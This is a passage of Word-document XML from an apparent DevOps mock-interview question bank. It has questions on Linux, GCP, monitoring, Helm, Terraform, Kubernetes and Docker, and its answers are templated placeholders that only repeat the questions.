      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Linux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a Linux server has very high load, how will you reduce it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q49. How do you check whether an application is running?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Linux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check whether an application is running?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q50. If you cannot log in to the server, how will you check the server load?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Linux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you cannot log in to the server, how will you check the server load?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q51. Have you worked on GKE or GCE?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GCP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the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on GKE or GCE?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q52. Which GCP services have you worked on?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GCP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the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GCP services have you worked on?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q53. Which monitoring tools have you worked on?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Monitoring</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Monitoring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monitoring tools have you worked on?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q54. Have you worked on Prometheus and Grafana?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Monitoring</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Monitoring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on Prometheus and Grafana?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q55. Did you integrate Prometheus and Grafana?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Monitoring</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Monitoring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Did you integrate Prometheus and Grafana?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q56. Have you worked with Helm?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Helm</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Helm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with Helm?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q57. How did you deploy Sentinel Antivirus using Helm?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Helm/Sentinel</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Helm/Sentinel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did you deploy Sentinel Antivirus using Helm?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q58. Was Sentinel deployed as a container?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Sentinel</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Sentinel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Was Sentinel deployed as a container?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q59. Was Sentinel deployed on all worker nodes?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Sentinel</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Sentinel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Was Sentinel deployed on all worker nodes?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 66 - Terraform Secret Creation Hands-On Round</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. Terraform: Secret Creation. You want to deploy a web application using Terraform. Complete /home/ubuntu/1063862-terraform-secret-creation/main.tf using HCL so that it initializes the hashicorp/local provider at version 2.1.0, declares a variable named secret whose value is passed through an environment variable during terraform apply, and creates a local_file resource at /run/secret with permissions 0600 and content from var.secret. The solution must live inside /home/ubuntu/1063862-terraform-secret-creation and be correct when evaluated by running sudo solve from that directory in a clean environment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform/Hands-On</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Terraform/Hands-On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Terraform: Secret Creation. You want to deploy a web application using Terraform. Complete /home/ubuntu/1063862-terraform-secret-creation/main.tf using HCL so that it initializes the hashicorp/local provider at version 2.1.0, declares a variable named secret whose value is passed through an environment variable during terraform apply, and creates a local_file resource at /run/secret with permissions 0600 and content from var.secret. The solution must live inside /home/ubuntu/1063862-terraform-secret-creation and be correct when evaluated by running sudo solve from that directory in a clean environment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 67 - Kubernetes StatefulSet Basic Implementation Hands-On Round</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. StatefulSet: Basic Implementation. In the hacker-company namespace, an existing headless Service named nginx has selector role: frontend and exposes port 80. Complete /home/ubuntu/171641-kubernetes-statefulset-basic-implementation/definition.yaml by implementing a StatefulSet named frontend in namespace hacker-company. It must use serviceName nginx, deploy 2 replicas, set labels so they match the Service selector role: frontend, run a container named nginx using image nginx:latest, and expose container port 80. Verify with kubectl get statefulset -n hacker-company, kubectl get pods -n hacker-company, kubectl describe statefulset frontend -n hacker-company, then finish with sudo solve.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes/Hands-On</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Kubernetes/Hands-On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StatefulSet: Basic Implementation. In the hacker-company namespace, an existing headless Service named nginx has selector role: frontend and exposes port 80. Complete /home/ubuntu/171641-kubernetes-statefulset-basic-implementation/definition.yaml by implementing a StatefulSet named frontend in namespace hacker-company. It must use serviceName nginx, deploy 2 replicas, set labels so they match the Service selector role: frontend, run a container named nginx using image nginx:latest, and expose container port 80. Verify with kubectl get statefulset -n hacker-company, kubectl get pods -n hacker-company, kubectl describe statefulset frontend -n hacker-company, then finish with sudo solve.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 68 - Docker HackerAPI Environment Variable Hands-On Round</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. Docker: HackerAPI Deployment, Environment Variables. Complete the script.sh file stub under /home/ubuntu/... so it runs a Docker container named hackerapi using image public.ecr.aws/docker/library/nginx:latest. The container must receive an environment variable named HACKERAPI_SECURITY_TOKEN with its value taken from the existing host environment variable of the same name, run in interactive background mode, and run without pseudo-TTY allocation. The expected command is: docker run -d -i --name hackerapi -e HACKERAPI_SECURITY_TOKEN=$HACKERAPI_SECURITY_TOKEN public.ecr.aws/docker/library/nginx:latest.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Docker/Hands-On</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Docker/Hands-On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Docker: HackerAPI Deployment, Environment Variables. Complete the script.sh file stub under /home/ubuntu/... so it runs a Docker container named hackerapi using image public.ecr.aws/docker/library/nginx:latest. The container must receive an environment variable named HACKERAPI_SECURITY_TOKEN with its value taken from the existing host environment variable of the same name, run in interactive background mode, and run without pseudo-TTY allocation. The expected command is: docker run -d -i --name hackerapi -e HACKERAPI_SECURITY_TOKEN=$HACKERAPI_SECURITY_TOKEN public.ecr.aws/docker/library/nginx:latest.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 69 - Terraform Validate Docker Project Round</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. Configure the Docker provider with the correct source and version.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform/Docker Provider</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Terraform/Docker Provider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Configure the Docker provider with the correct source and version.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. Define the required_providers block for a Terraform Docker project.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform/Providers</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Terraform/Providers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Define the required_providers block for a Terraform Docker project.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. How do you initialize a Terraform project, and why is terraform init required before validation?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform/Commands</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Terraform/Commands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initialize a Terraform project, and why is terraform init required before validation?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. How do you validate a Terraform configuration, and what kinds of errors does terraform validate catch?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform/Commands</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Terraform/Commands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validate a Terraform configuration, and what kinds of errors does terraform validate catch?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. How would you identify and fix syntax errors in a Terraform configuration?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform/Syntax</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Terraform/Syntax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identify and fix syntax errors in a Terraform configuration?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. How do you configure a Docker provider in Terraform?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform/Docker Provider</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Terraform/Docker Provider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configure a Docker provider in Terraform?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. How do you create a Docker image resource in Terraform?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform/Docker Image</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Terraform/Docker Image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create a Docker image resource in Terraform?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. How do you create a Docker container resource in Terraform?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform/Docker Container</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Terraform/Docker Container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create a Docker container resource in Terraform?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q9. How do you expose a container port using the ports block?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform/Ports</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Terraform/Ports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expose a container port using the ports block?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q10. How do you map internal port 80 to external port 8000 in a Terraform Docker container resource?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform/Ports</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Terraform/Ports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map internal port 80 to external port 8000 in a Terraform Docker container resource?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q11. How do you reference one Terraform resource from another?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform/Dependencies</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Terraform/Dependencies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reference one Terraform resource from another?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q12. How do you use the image_id attribute of a docker_image resource in a docker_container resource?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform/Docker Image</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Terraform/Docker Image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use the image_id attribute of a docker_image resource in a docker_container resource?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q13. Differentiate between terraform init, terraform validate, and terraform apply.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform/Commands</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Terraform/Commands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Differentiate between terraform init, terraform validate, and terraform apply.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q14. How do provider version constraints work in Terraform, for example ~&gt; 3.0.1?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform/Versioning</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Terraform/Versioning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provider version constraints work in Terraform, for example ~&gt; 3.0.1?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q15. How would you identify missing Terraform configuration required for successful validation?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform/Troubleshooting</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Terraform/Troubleshooting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identify missing Terraform configuration required for successful validation?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
